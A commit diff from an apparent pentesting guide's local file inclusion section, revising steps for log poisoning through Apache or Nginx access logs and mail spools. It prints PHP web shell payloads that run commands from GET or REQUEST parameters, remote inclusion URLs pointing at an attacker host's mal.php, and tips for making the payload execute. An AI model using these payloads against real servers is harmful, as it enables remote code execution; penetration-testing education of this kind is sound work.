GITBOOK-3846: change request with no subject merged in GitBook
This commit is contained in:
parent
2d77cef895
commit
221c5f2ad6
@ -471,12 +471,16 @@ http://example.com/index.php?page=http://atacker.com/mal.php
|
||||
http://example.com/index.php?page=\\attacker.com\shared\mal.php
|
||||
```
|
||||
|
||||
### Via Apache log file
|
||||
### Via Apache/Nginx log file
|
||||
|
||||
If the Apache server is vulnerable to LFI inside the include function you could try to access to _**/var/log/apache2/access.log**_, set inside the user agent or inside a GET parameter a php shell like `<?php system($_GET['c']); ?>` and execute code using the "c" GET parameter.
|
||||
If the Apache or Nginx server is **vulnerable to LFI** inside the include function you could try to access to **`/var/log/apache2/access.log` or `/var/log/nginx/access.log`**, set inside the **user agent** or inside a **GET parameter** a php shell like **`<?php system($_GET['c']); ?>`** and include that file
|
||||
|
||||
{% hint style="warning" %}
|
||||
Note that **if you use double quotes** for the shell instead of **simple quotes**, the double quotes will be modified for the string "_**quote;**_", **PHP will throw an error** there and **nothing else will be executed**.
|
||||
|
||||
Also, make sure you **write correctly the payload** or PHP will error every time it tries to load the log file and you won't have a second opportunity.
|
||||
{% endhint %}
|
||||
|
||||
This could also be done in other logs but b**e careful,** the code inside the logs could be URL encoded and this could destroy the Shell. The header **authorisation "basic"** contains "user:password" in Base64 and it is decoded inside the logs. The PHPShell could be inserted inside this header.\
|
||||
Other possible log paths:
|
||||
|
||||
@ -496,7 +500,7 @@ Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzin
|
||||
|
||||
### Via Email
|
||||
|
||||
Send a mail to a internal account (user@localhost) containing `<?php echo system($_REQUEST["cmd"]); ?>` and access to the mail _**/var/mail/USER\&cmd=whoami**_
|
||||
**Send a mail** to a internal account (user@localhost) containing your PHP payload like `<?php echo system($_REQUEST["cmd"]); ?>` and try to include to the mail of the user with a path like **`/var/mail/<USERNAME>`** or **`/var/spool/mail/<USERNAME>`**
|
||||
|
||||
### Via /proc/\*/fd/\*
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user